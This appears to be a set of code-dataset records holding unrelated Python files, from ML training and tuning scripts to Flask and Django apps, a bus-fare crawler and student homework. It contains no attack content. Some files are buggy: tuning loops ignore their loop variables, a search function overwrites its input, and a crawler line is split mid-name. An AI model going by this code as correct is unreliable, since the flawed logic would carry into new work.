PCA(n_components=50)\r\nx_pca_new=pca.fit_transform(x)#在各主成分投影数据,做主成分得分\r\nx_pca_new=DataFrame(x_pca_new)\r\ntest11=x_pca_new.iloc[48383:,:]\r\ntrain11=x_pca_new.iloc[0:48383,:]\r\ntrain11.loc[:,\"class\"]=data_train.iloc[:,2600]\r\ntrain11_train,train11_test=train_test_split(train11,test_size=0.3)\r\n#参数寻优\r\nresults1 = []\r\n\r\n# 决策树个数参数取值\r\nn_estimators_options=list(range(100,400,5))\r\n\r\nmax_depth_options=list(range(39,55,1))\r\nmin_samples_split_options=list(range(2,50,2))\r\nmax_leaf_nodes_options=list(range(1,50,4))\r\nrandomstate_options=list(range(0,50,2))\r\nmin_samples_leaf_options=list(range(1,40,2))\r\n\r\nfor n_estimators_size in n_estimators_options:\r\n for max_depth_size in max_depth_options:\r\n clf = RandomForestClassifier(max_features=19,min_samples_leaf=8,n_estimators=265,max_depth=50 ,n_jobs=-1,criterion=\"gini\",oob_score=True,class_weight=\"balanced\")\r\n clf.fit(train11_train.iloc[:,0:50],train11_train.iloc[:,50])\r\n q1=clf.predict(train11_test.iloc[:,0:50])\r\n#计算F1得分\r\n score_test = sklearn.metrics.f1_score(train11_test.iloc[:,50], q1, pos_label=list(set(train11_test.iloc[:,50])),average = None)\r\n results1.append((max_depth_size ,np.mean(score_test)))\r\n#输出最佳参数组合\r\nprint(max(results1, key=lambda x:x[1]))\r\nresults2=[]\r\nmax_features_options=list(range(37,51,2))\r\nfor max_features_size in max_features_options:\r\n clf = RandomForestClassifier(max_features=29,min_samples_leaf=8,n_estimators=265,max_depth=50 ,n_jobs=-1,criterion=\"gini\",oob_score=True,class_weight=\"balanced\")\r\n clf.fit(train11_train.iloc[:,0:50],train11_train.iloc[:,50])\r\n q1=clf.predict(train11_test.iloc[:,0:50])\r\n#计算F1得分\r\n score_test = sklearn.metrics.f1_score(train11_test.iloc[:,50], q1, pos_label=list(set(train11_test.iloc[:,50])),average = None)\r\n results2.append((max_features_size ,np.mean(score_test)))\r\n\r\nresults3=[]\r\nmin_samples_leaf_options=list(range(2,30,2))\r\nfor min_samples_leafs in min_samples_leaf_options:\r\n clf = RandomForestClassifier(min_samples_leaf=4,max_features=29,n_estimators=265,max_depth=50 
,n_jobs=-1,criterion=\"gini\",oob_score=True,class_weight=\"balanced\")\r\n clf.fit(train11_train.iloc[:,0:50],train11_train.iloc[:,50])\r\n q1=clf.predict(train11_test.iloc[:,0:50])\r\n#计算F1得分\r\n score_test = sklearn.metrics.f1_score(train11_test.iloc[:,50], q1, pos_label=list(set(train11_test.iloc[:,50])),average = None)\r\n results3.append((min_samples_leafs ,np.mean(score_test)))\r\n \r\nresults1=[]\r\nmin_samples_split_options=list(range(2,100,2))\r\nfor min_samples_splits in min_samples_split_options:\r\n clf = RandomForestClassifier(min_samples_leaf=4,min_samples_split=min_samples_splits,max_features=29,\r\n n_estimators=265,max_depth=50 ,n_jobs=-1,\r\n criterion=\"gini\",oob_score=True,class_weight=\"balanced\",random_state=4,bootstrap=True)\r\n clf.fit(train11_train.iloc[:,0:50],train11_train.iloc[:,50])\r\n q1=clf.predict(train11_test.iloc[:,0:50])\r\n#计算F1得分\r\n score_test = sklearn.metrics.f1_score(train11_test.iloc[:,50], q1, pos_label=list(set(train11_test.iloc[:,50])),average = None)\r\n results1.append((min_samples_splits ,np.mean(score_test)))\r\n#输出最佳参数组合\r\nprint(max(results1, key=lambda x:x[1]))\r\n\r\n ","repo_name":"Gang1997/Astronomy-mining-contest","sub_path":"tune.py","file_name":"tune.py","file_ext":"py","file_size_in_byte":4663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
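The script imports GridSearchCV but never uses it; the manual sweeps above can be folded into one cross-validated search. A sketch over the same train11 frame, with grid values picked from the ranges the script defines (the exact grid is an assumption):

param_grid = {'n_estimators': [165, 265, 365],
              'max_depth': [40, 45, 50],
              'max_features': [19, 29, 39],
              'min_samples_leaf': [4, 8, 16]}
search = GridSearchCV(RandomForestClassifier(criterion='gini', class_weight='balanced', n_jobs=-1),
                      param_grid, scoring='f1_macro', cv=3)
search.fit(train11.iloc[:, 0:50], train11.iloc[:, 50])
print(search.best_params_, search.best_score_)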
+{"seq_id":"41734731749","text":"import random\nimport numpy as np\nfrom helper import getCostOfRoute\n\ndef initialize_bat_population(graph, population_size):\n bats = []\n for _ in range(population_size):\n bat = list(range(len(graph)))\n random.shuffle(bat)\n bats.append(bat)\n return bats\n\ndef update_velocity(bats, velocities, best_bat, graph, alpha):\n for i in range(len(bats)):\n velocities[i] = (np.array(velocities[i]) + alpha * (np.array(best_bat) - np.array(bats[i]))).tolist()\n\ndef update_position(bats, velocities):\n for i in range(len(bats)):\n for j in range(len(bats[i])):\n r = random.random()\n if r < abs(velocities[i][j]):\n swap_idx = int((j + abs(velocities[i][j])) % len(bats[i]))\n bats[i][j], bats[i][swap_idx] = bats[i][swap_idx], bats[i][j]\n\ndef local_search(bat, graph):\n i, j = random.sample(range(len(bat)), 2)\n new_bat = bat.copy()\n new_bat[i], new_bat[j] = new_bat[j], new_bat[i]\n if getCostOfRoute(new_bat, graph) < getCostOfRoute(bat, graph):\n return new_bat\n return bat\n\ndef bat_algorithm(graph, population_size, max_iter, alpha):\n bats = initialize_bat_population(graph, population_size)\n velocities = [[0 for _ in range(len(graph))] for _ in range(population_size)]\n best_bat = min(bats, key=lambda x: getCostOfRoute(x, graph))\n\n # Initialize the cost history\n cost_history = []\n\n for _ in range(max_iter):\n update_velocity(bats, velocities, best_bat, graph, alpha)\n update_position(bats, velocities)\n\n for i in range(len(bats)):\n bats[i] = local_search(bats[i], graph)\n\n current_best_bat = min(bats, key=lambda x: getCostOfRoute(x, graph))\n current_best_cost = getCostOfRoute(current_best_bat, graph)\n cost_history.append(current_best_cost)\n\n if current_best_cost < getCostOfRoute(best_bat, graph):\n best_bat = current_best_bat\n\n return best_bat, cost_history","repo_name":"Blaze10/AI","sub_path":"Nature-Inspired Algorithms A Comparative Study/bat_algorithm.py","file_name":"bat_algorithm.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"31972592462","text":"import core.forms\nimport core.models\nfrom core.views.crud_view_methods import (\n create_methods,\n delete_methods,\n detail_methods,\n list_methods,\n update_methods,\n)\nfrom core.views.crud_view_methods.model_view_generic import (\n GenericDeleteView,\n GenericModelEdit,\n GenericModelList,\n GenericModelView,\n)\nfrom core.views.user_views import SelectLabMixin\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.urls import reverse_lazy\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.edit import CreateView, DeleteView, FormView, UpdateView\n\n\nclass LoginRequired(LoginRequiredMixin):\n login_url = \"/\"\n redirect_field_name = \"redirect_to\"\n\n\ndef create_list_view(model_name, methods):\n globals()[model_name + \"List\"] = type(\n model_name + \"List\",\n tuple([LoginRequired, SelectLabMixin, GenericModelList]),\n methods,\n )\n\n\ndef create_create_view(model_name, methods):\n globals()[model_name + \"Create\"] = type(\n model_name + \"Create\",\n tuple([LoginRequired, SelectLabMixin, GenericModelEdit, CreateView]),\n methods,\n )\n\n\ndef create_update_view(model_name, methods):\n globals()[model_name + \"Update\"] = type(\n model_name + \"Update\",\n tuple([LoginRequired, SelectLabMixin, GenericModelEdit, UpdateView]),\n methods,\n )\n\n\ndef create_delete_view(model_name, methods):\n globals()[model_name + \"Delete\"] = type(\n model_name + \"Delete\",\n tuple([LoginRequired, SelectLabMixin, GenericDeleteView]),\n methods,\n )\n\n\ndef create_detail_view(model_name, methods):\n globals()[model_name + \"View\"] = type(\n model_name + \"View\",\n tuple([LoginRequired, SelectLabMixin, GenericModelView]),\n methods,\n )\n\n\nfor model_name, methods_list in list_methods.methods.items():\n create_list_view(model_name, methods_list)\n\nfor model_name, methods_list in create_methods.methods.items():\n create_create_view(model_name, methods_list)\n\nfor model_name, methods_list in detail_methods.methods.items():\n create_detail_view(model_name, methods_list)\n\nfor model_name, methods_list in delete_methods.methods.items():\n create_delete_view(model_name, methods_list)\n\nfor model_name, methods_list in update_methods.methods.items():\n create_update_view(model_name, methods_list)\n","repo_name":"darkreactions/ESCALATE","sub_path":"escalate/core/views/crud_views.py","file_name":"crud_views.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"19"}
+{"seq_id":"32572954732","text":"#!/usr/bin/env python\n#\n# -*- mode:python; sh-basic-offset:4; indent-tabs-mode:nil; coding:utf-8 -*-\n# vim:set tabstop=4 softtabstop=4 expandtab shiftwidth=4 fileencoding=utf-8:\n#\n\nimport sys\nimport suites\nimport unittest\n\n\ndef test_suites():\n allsuites = []\n for s in (\n suites.coding_style,\n suites.shell_docs,\n ):\n allsuites.append(s.test_cases())\n alltests = unittest.TestSuite(allsuites)\n return alltests\n\n\ndef main():\n runner = unittest.TextTestRunner(verbosity=2)\n result = runner.run(test_suites())\n return (len(result.errors) + len(result.failures)) > 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"clusto/clusto-apiserver","sub_path":"tests/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
+{"seq_id":"71279592682","text":"import megabus_request\r\nimport megabus_record\r\nimport megabus_analyze\r\nimport megabus_display\r\nimport megabus_date\r\n\r\n#working database of prices.\r\nweek_days = {\r\n # outbound prices\r\n 'outbound': {\r\n 'monday':[25,23,25],\r\n 'tuesday':[] ,\r\n 'wednesday':[],\r\n 'thursday':[],\r\n 'friday': [],\r\n 'saturday':[],\r\n 'sunday':[],\r\n },\r\n 'inbound':{\r\n 'imonday' : [],\r\n 'ituesday' : [],\r\n 'iwednesday' :[],\r\n 'ithursday' : [],\r\n 'ifriday' : [],\r\n 'isaturday' : [],\r\n 'isunday' :[],}\r\n }\r\n\r\n\r\nmegabus_display.run_mainSpider()\r\n#origin = input('From: ')\r\n#destination = input('Destination: ')\r\ncrawling = megabus_date.Date()\r\ncrawling_date, crawling_day = crawling.format_date(), crawling.day_of_the_week()\r\nurl = megabus_request.format('New York, ny', 'Boston, MA', crawling_date)\r\n\r\n\r\n# Displays a summary of the trip that is being searched\r\n#2megabus.params_message(html)\r\n\r\ndaysSpan = 90\r\n\r\n\r\n# collect data\r\nfor number in range(0,daysSpan):\r\n print(crawling)\r\n if crawling_date == -1:\r\n crawling.increment_month()\r\n daysSpan = daysSpan + 1\r\n continue\r\n outbound = megabus_record.record_trips(url, 'outbound', crawling_day, week_days)\r\n inbound = megabus_record.record_trips(url,'inbound', crawling_day, week_days)\r\n crawling.increment_day()\r\n crawling_day = c\r\n rawling.day_of_the_week()\r\n\r\n# Resets dates to compare data\r\ncrawling = megabus_date.Date()\r\ncrawling_day = crawling.day_of_the_week()\r\ndaysSpan = 90\r\n\r\nfor number in range(0,daysSpan):\r\n if crawling_date == None:\r\n crawling.increment_month()\r\n daysSpan = daysSpan + 1\r\n continue\r\n outbound = megabus_analyze.compare_trip_prices(url, 'outbound', crawling_day, week_days)\r\n inbound = megabus_analyze.compare_trip_prices(url,'inbound', crawling_day, week_days)\r\n crawling.increment_day()\r\n crawling_day = crawling.day_of_the_week()\r\n\r\n\r\n\r\nprint(week_days)\r\n\r\n\r\n# Display\r\n# Request information\r\n# Records information\r\n# Rads information\r\n# Analyze information","repo_name":"GregBorrelly/MegabusWebCrawler","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
+{"seq_id":"38011734000","text":"from flask import Flask, Blueprint, request\nfrom flask_restful import Resource, Api, reqparse\nfrom flask_restful import fields, marshal_with, inputs\n\nfrom app.calculator import FreelanceEntry\n\nfrom .. models import db\n\napi_mod = Blueprint('api', __name__, url_prefix = '/api')\napi = Api(api_mod) # instead of Api(app)\n\ncalculation_row = {\n\t'type' : fields.String,\n\t'hours' :fields.String,\n\t'pay'\t:fields.String,\n\t'rate'\t:fields.String,\n}\n\ncalculation_results = {\n\t'rows' : fields.List(fields.Nested(calculation_row)),\n\t'total_hours' : fields.String,\n\t'total_pay' : fields.String,\n}\n\nparser = reqparse.RequestParser()\n\n# HourlyRate\nparser.add_argument('hours_worked', type=inputs.regex('^[0-9]+$'))\nparser.add_argument('hourly_rate', type=inputs.regex('^[0-9]+$'))\n\n# GuaranteedHours\nparser.add_argument('guaranteed_rate', type=inputs.regex('^[0-9]+$'))\nparser.add_argument('guaranteed_hours', type=inputs.regex('^[0-9]+$'))\nparser.add_argument('actual_hours_worked', type=inputs.regex('^[0-9]+$'))\n\n# for cache = false in ajax get request object (get's around IE's caching)\nparser.add_argument('_', type=str)\n\n\n# Calling parse_args with strict=True ensures that an error is thrown if\n# the request includes arguments your parser does not define.\n# args = parser.parse_args(strict=True)\n\n\nclass Calculation(Resource):\n\t@marshal_with(calculation_results)\n\tdef get(self, calculation_type):\n\t\targs = parser.parse_args(strict = True)\n\t\tif calculation_type == 'hourly_rate':\n\t\t\tentry = FreelanceEntry(\n\t\t\t\thourly_rate = args['hourly_rate'],\n hours = args['hours_worked'],\n ) \n\t\telif calculation_type == 'guaranteed_hours':\n\t\t\tentry = FreelanceEntry(\n\t\t\t\tguaranteed_rate = args['guaranteed_rate'],\n guaranteed_hours = args['guaranteed_hours'],\n hours_worked = args['actual_hours_worked'],\n \t)\n\t\tcalculation = {\n\t\t\t'rows': [],\n\t\t\t'total_hours' : entry.total['hours'],\n\t\t\t'total_pay' : entry.total['pay'],\n\t\t\t}\n\t\tfor time_type in ['regular','overtime','doubletime']:\n\t\t\tcalculation['rows'].append({\n\t\t\t\t'type'\t: time_type,\n\t\t\t\t'hours'\t: getattr(entry,time_type)['hours'],\n\t\t\t\t'pay'\t: getattr(entry,time_type)['pay'],\n\t\t\t\t'rate'\t: getattr(entry,time_type)['rate'],}\n\t\t\t\t)\n\t\t\tprint(calculation['rows'])\n\t\treturn calculation, 201\n\n# Setup the API resource routing here\napi.add_resource(Calculation, '/calc/')\n","repo_name":"Davidthecoolsmartguy/EasyFreelancer","sub_path":"app/mod_api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"13775385370","text":"from turtle import Turtle\n\nFONT = (\"Courier\", 24, \"normal\")\n\n\n# displays the current level in the upper left of the screen f\"Level: {level_number}\"\n# and GAME OVER when the gams has ended.\n\nclass Scoreboard(Turtle):\n def __init__(self):\n super().__init__()\n self.color(\"black\")\n self.penup()\n self.hideturtle()\n self.level_number = 0\n self.update_level()\n\n def update_level(self):\n self.clear()\n self.level_number += 1\n self.goto(-230, 260)\n self.write(f\"Level: {self.level_number}\", align=\"center\", font=FONT)\n\n def game_over(self):\n self.goto(0,0)\n self.write(\"GAME OVER\", align=\"center\", font=FONT)\n","repo_name":"waterseeker/100DaysOfCodePython","sub_path":"Day23/scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"36171924726","text":"import os\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager\n\n\ndb = SQLAlchemy()\n\n\ndef create_app():\n\n app = Flask(__name__)\n\n app.config['SECRET_KEY'] = os.getenv(\"SECRET_KEY\")\n app.config['SQLALCHEMY_DATABASE_URI'] = os.getenv(\"SQLALCHEMY_DATABASE_URI\")\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n db.init_app(app)\n\n login_manager = LoginManager()\n login_manager.login_view = \"auth.login\"\n login_manager.login_message_category = \"danger\"\n login_manager.init_app(app)\n\n from .models import User, Books\n\n @login_manager.user_loader\n def load_user(user_id):\n return User.query.get(int(user_id))\n\n from .main import main as main_blueprint\n app.register_blueprint(main_blueprint)\n\n from .auth import auth as auth_blueprint\n app.register_blueprint(auth_blueprint)\n\n from .book import book as book_blueprint\n app.register_blueprint(book_blueprint)\n\n from .api import api as api_blueprint\n app.register_blueprint(api_blueprint)\n\n with app.app_context():\n db.create_all()\n return app\n","repo_name":"gomezlucas/BookEdx","sub_path":"application/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"73436114604","text":"import pygame, sys, os\nfrom pygame.locals import *\n\n# Content Manager\nclass Content:\n # Builds a Content Manager to a relative path\n def __init__(self, path):\n self.path = path\n\n # Tries to load an image\n # colorkey: -1, (255,255,255), None\n def load_image(self, name, colorkey=None, scale=1,):\n fullname = os.path.join(self.path, name)\n try:\n image = pygame.image.load(fullname)\n except pygame.error(message):\n print(\"Cannot load image:\", name)\n raise SystemExit(message)\n # Apply color key\n image = image.convert()\n if colorkey is not None:\n if colorkey is -1:\n colorkey = image.get_at((0,0))\n image.set_colorkey(colorkey, RLEACCEL)\n \n # Scale image\n if scale == 2:\n image = pygame.transform.scale2x(image)\n elif scale > 2:\n width = image.get_width()* scale\n height = image.get_height() * scale\n image = pygame.transform.smoothscale(image, (width, height)) \n \n return image\n\n # Tries to load a sound\n def load_sound(self, name):\n class NoneSound:\n def play(self): pass\n if not pygame.mixer:\n return NoneSound()\n fullname = os.path.join(self.path, name)\n try:\n sound = pygame.mixer.Sound(fullname)\n except pygame.error(message):\n print(\"Cannot load sound:\", wav)\n raise SystemExit(message)\n return sound\n\n # Loads a set of images\n def load_images(self, array):\n images = []\n for item in array:\n if len(item) == 1:\n images.append(self.load_image(item[0]))\n else:\n images.append(self.load_image(item[0], item[1]))\n return images\n","repo_name":"dacanizares/CafeinaRobot","sub_path":"cafeinagame/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"8207195739","text":"# ДЗ*:\n# 1. Написать функцию binary_search, принимающую в качестве входящего\n# параметра элемент для поиска и список в котором необходимо искать.\n# 2. Алгоритм должен искать с помощью двоичного поиска,\n# изображенного на блок-схеме презентации.\n# 3. Функция в итоге должна распечатать результат. Применить 1 раз эту функцию\n# 4. Написать функцию buble_sort или selection_sort,\n# принимающую в качестве входящего параметра не отсортированный список.\n# 5. Алгоритм функции должен сортировать список методом пузырьковой\n# сортировки или методом сортировки выбором.\n# 6. Функция в итоге должна возвращать отсортированный список.\n# Применить 1 раз данную функцию\n\ndef binary_search(spisok, n): \n spisok = [1,2,3,4,5,6,7,8,9,12,17,85,23,28,33,35,39,40,47,46,56,66,67,90]\n left = -1 \n right = len(spisok) \n while right > left + 1: \n middle = (left + right) // 2 \n if spisok[middle] >= n: \n right = middle \n else: \n left = middle \n return right\n\nprint(binary_search(spisok=[1,2,3,4,5,6,7,8,9,12,17,19,23,28,33,35,39,40,47,46,56,66,67,90] , n=40))\n\n\n\n\n\ndef buble_sort (list):\n\n done = False\n while not done:\n done = True\n for i in range(len(list)-1):\n if list[i] > list[i+1]:\n list[i], list[i+1] = list[i+1], list[i]\n done = False\n print(list)\nprint(buble_sort(list = [33,67,23,59,90,77,35,45]))","repo_name":"Aiba0709/Ubuntu","sub_path":"2-курс/homework7/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"1842230644","text":"# import custom modules\nimport sys\nsys.path.insert(0, \"src/util\")\nsys.path.insert(0, \"src/data_util\")\n\n# imports\nimport torch\nimport torchvision\n\nimport copy\nimport torch.optim as optim\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.checkpoint as cp\nfrom torchvision import datasets, models, transforms\nfrom sklearn.metrics import f1_score\nimport os\n\nfrom nbdt.model import SoftNBDT\nfrom nbdt.model import HardNBDT\nfrom nbdt.loss import SoftTreeSupLoss\nfrom nbdt.loss import HardTreeSupLoss\n\nfrom write_to_json import *\n\ndef train_model(model, dataloaders, criterion, optimizer, num_epochs=25):\n '''\n trains model by using train and validation sets\n '''\n # define lists\n best_model_wts = copy.deepcopy(model.state_dict())\n best_fscore = 0.0\n \n loss_train_evo=[]\n acc_train_evo=[]\n fs_train_evo=[]\n \n loss_val_evo=[]\n acc_val_evo=[]\n fs_val_evo=[] \n \n # Detect if we have a GPU available\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n \n print('---> Begin model training...')\n for epoch in range(num_epochs):\n i = 0\n print('Epoch {}/{}'.format(epoch+1, num_epochs))\n\n # determine if in train or validation phase\n for phase in ['train_snakes_r1', 'valid_snakes_r1']:\n if phase == 'train_snakes_r1':\n model.train() # Set model to training mode\n else:\n model.eval() # Set model to evaluate mode\n \n running_loss = 0.0\n running_corrects = 0\n fscore = []\n\n # iterate over data\n for inputs, labels in dataloaders[phase]:\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n # zero the parameter gradients before beginning backprop\n optimizer.zero_grad()\n\n # forward\n # track history if only in train\n\n with torch.set_grad_enabled(phase == 'train_snakes_r1'):\n # calculate loss from model outputs\n outputs = model(inputs)\n loss = criterion(outputs, labels)\n _, preds = torch.max(outputs, 1)\n\n # backward + optimize only if in training phase\n if phase == 'train_snakes_r1':\n loss.backward()\n optimizer.step()\n\n # statistics\n labels_cpu = labels.cpu().numpy()\n predictions_cpu = preds.cpu().numpy()\n Fscore = f1_score(labels_cpu, predictions_cpu, average='macro')\n fscore.append(Fscore)\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n\n epoch_loss = running_loss / len(dataloaders[phase].dataset)\n epoch_acc = running_corrects.double() / len(dataloaders[phase].dataset)\n epoch_fscore = np.average(np.array(fscore))\n \n print('{} Loss: {:.4f} Acc: {:.4f} F: {:.3f}'.format(phase, epoch_loss, epoch_acc, epoch_fscore))\n \n if phase == 'train_snakes_r1':\n loss_train_evo.append(epoch_loss)\n epoch_acc = epoch_acc.cpu().numpy()\n acc_train_evo.append(epoch_acc)\n fs_train_evo.append(epoch_fscore) \n else:\n loss_val_evo.append(epoch_loss)\n epoch_acc = epoch_acc.cpu().numpy()\n acc_val_evo.append(epoch_acc)\n fs_val_evo.append(epoch_fscore) \n \n # deep copy the model\n if phase == 'valid_snakes_r1' and epoch_fscore > best_fscore:\n best_acc = epoch_acc\n best_model_wts = copy.deepcopy(model.state_dict())\n\n # load best model weights\n model.load_state_dict(best_model_wts)\n \n print(\"---> Finished model training.\")\n \n return model, loss_train_evo, acc_train_evo, fs_train_evo, loss_val_evo, acc_val_evo, fs_val_evo\n\ndef set_parameter_requires_grad(model, feature_extracting):\n '''\n sets the .requires_grad attribute of the parameters in the model to False when we are feature 
extracting\n '''\n if feature_extracting:\n for param in model.parameters():\n param.requires_grad = False\n \ndef initialize_model(model_name, num_classes, feature_extract, use_pretrained=True):\n '''\n initializes pretrained vgg model\n '''\n print(\"---> Begin model initialization...\")\n ft_extract = False\n if feature_extract == \"True\":\n ft_extract=True\n\n model_ft = models.densenet121(pretrained=use_pretrained)\n set_parameter_requires_grad(model_ft, ft_extract)\n num_ftrs = model_ft.classifier.in_features\n model_ft.classifier = nn.Linear(num_ftrs, num_classes)\n input_size = 224\n\n print(\"---> Finished model initialization.\")\n \n return model_ft, input_size\n\ndef create_dataloaders(DATA_DIR, batch_size, input_size):\n '''\n return model transformations for training and validation sets\n '''\n print(\"---> Begin dataloader creation...\")\n \n data_transforms = {\n 'train_snakes_r1': transforms.Compose([\n transforms.RandomResizedCrop(input_size),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation([0, 90]),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]),\n 'valid_snakes_r1': transforms.Compose([\n transforms.RandomResizedCrop(input_size),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation([0, 90]),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]),\n } \n \n # Create training and validation datasets\n image_datasets = {\n x: datasets.ImageFolder(os.path.join(DATA_DIR, x), data_transforms[x]) for x in [\n 'train_snakes_r1',\n 'valid_snakes_r1'] \n }\n \n # Create training and validation dataloaders\n dataloaders_dict = {\n x: torch.utils.data.DataLoader(\n image_datasets[x],\n batch_size=batch_size,\n shuffle=True,\n num_workers=4\n ) for x in [\n 'train_snakes_r1',\n 'valid_snakes_r1'\n ]\n }\n print(\"---> Finished creating dataloaders.\")\n \n return dataloaders_dict, len(image_datasets['train_snakes_r1'].classes)\n\ndef params_to_update(model_ft, feature_extract):\n '''\n defines params to update for optimizer, based on feature extract\n '''\n ft_extract = False\n if feature_extract == \"True\":\n ft_extract=True\n \n params_to_update = model_ft.parameters()\n if ft_extract:\n params_to_update = []\n for name,param in model_ft.named_parameters():\n if param.requires_grad == True:\n params_to_update.append(param)\n # print(\"\\t\",name)\n else:\n for name,param in model_ft.named_parameters():\n if param.requires_grad == True:\n a=1 # print(\"\\t\",name)\n \n return params_to_update\n\ndef run_model(data_cfg, model_cfg, criterion):\n '''\n Runs model based on parameters from data_cfg and model_cfg. 
Additionally, writes best model's weights to a path in config\n '''\n \n # create dataloaders\n dataloaders_dict, num_classes = create_dataloaders(\n data_cfg['dataDir'],\n model_cfg['batchSize'],\n model_cfg['inputSize']\n )\n \n # Detect if we have a GPU available\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n # Initialize the model for this run\n model_ft, input_size = initialize_model(\n model_cfg['modelName'],\n num_classes,\n feature_extract = model_cfg['featureExtract'],\n use_pretrained=True\n )\n\n model_ft = model_ft.to(device) # make model use GPU\n\n params_update = params_to_update(model_ft, model_cfg['featureExtract'])\n\n # Optimizer\n optimizer_ft = optim.Adam(params_update, lr=model_cfg['lr'])\n \n # train model\n model_ft, loss_train, acc_train, fs_train, loss_val, acc_val, fs_val = train_model(\n model_ft,\n dataloaders_dict,\n criterion,\n optimizer = optimizer_ft,\n num_epochs = model_cfg['nEpochs'])\n \n # save model\n save_model(model_ft, data_cfg, model_cfg)\n \n return model_ft, loss_train, acc_train, fs_train, loss_val, acc_val, fs_val \n \ndef save_model(model_ft, data_cfg, model_cfg):\n '''\n saves weights of a passed model\n '''\n # save model to model states in params\n now = datetime.now().strftime(\"%d%m%Y_%H:%M\")\n model_path = os.path.join(data_cfg['dataDir'], \"model_states\")\n model_name = os.path.join(\n model_path, \n \"{}_{}_{}.pth\".format(\n now,\n model_cfg['nEpochs'],\n model_cfg['modelName']\n )\n )\n if not os.path.isdir(model_path): # make sure model path is made\n print(\"---> Creating {}\".format(model_path))\n os.mkdir(model_path)\n \n # saves model\n print('---> saving model at {}/{}'.format(model_path, model_name))\n torch.save(model_ft.state_dict(), model_name)\n \n \ndef run_nbdt(data_cfg, model_cfg, loss_type):\n '''\n Runs nbdt \n '''\n # check to make sure loss_type is specified\n assert (\n loss_type in [\"SoftTreeSupLoss\", \"HardTreeSupLoss\"]\n ), \"Please specify SoftTreeSupLoss or HardTreeSupLoss\"\n \n # create dataloaders\n dataloaders_dict, num_classes = create_dataloaders(\n data_cfg['dataDir'],\n model_cfg['batchSize'],\n model_cfg['inputSize']\n )\n \n # Detect if we have a GPU available\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n # Initialize the model for this run\n model, input_size = initialize_model(\n model_cfg['modelName'],\n num_classes,\n feature_extract = model_cfg['featureExtract'],\n use_pretrained=True\n ) \n \n # load model weights\n if loss_type == \"SoftTreeSupLoss\":\n model_weights = torch.load(data_cfg['hierarchyModelPath'])\n elif loss_type == \"HardTreeSupLoss\":\n model_weights = torch.load(data_cfg['hierarchyModelPath'])\n \n model = model.to(device) # make model use GPU\n model.load_state_dict(model_weights)\n \n # create NBDT\n print('---> Creating NBDT...')\n if loss_type == \"SoftTreeSupLoss\":\n model = SoftNBDT(\n model = model,\n dataset = 'snakes', \n hierarchy='induced-densenet121',\n path_graph = os.path.join(data_cfg['hierarchyPath'], data_cfg['hierarchyJSON']),\n path_wnids = data_cfg['wnidPath']\n )\n else:\n model = HardNBDT(\n model = model,\n dataset = 'snakes', \n hierarchy='induced-densenet121',\n path_graph = os.path.join(data_cfg['hierarchyPath'], data_cfg['hierarchyJSON']),\n path_wnids = data_cfg['wnidPath']\n )\n print('---> Finished creating NBDT.')\n \n model.eval()\n\n running_corrects = 0\n fscore = []\n\n print('---> Running inference...')\n # iterate over data\n for inputs, labels in 
dataloaders_dict['valid_snakes_r1']:\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n with torch.no_grad():\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n\n # statistics\n labels_cpu = labels.cpu().numpy()\n predictions_cpu = preds.cpu().numpy()\n Fscore = f1_score(labels_cpu, predictions_cpu, average='macro')\n fscore.append(Fscore)\n running_corrects += torch.sum(preds == labels.data)\n print('---> Finished running inference...')\n \n epoch_acc = running_corrects.double() / len(dataloaders_dict['valid_snakes_r1'].dataset)\n epoch_fscore = np.average(np.array(fscore))\n \n print(\" \")\n print('{} Acc: {:.4f} F1: {:.4f}'.format('NBDT Test', epoch_acc, epoch_fscore))\n print(\" \")","repo_name":"nikolettuce/SnakeClassification_NeuralBackedDecisionTrees","sub_path":"src/model/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":12228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
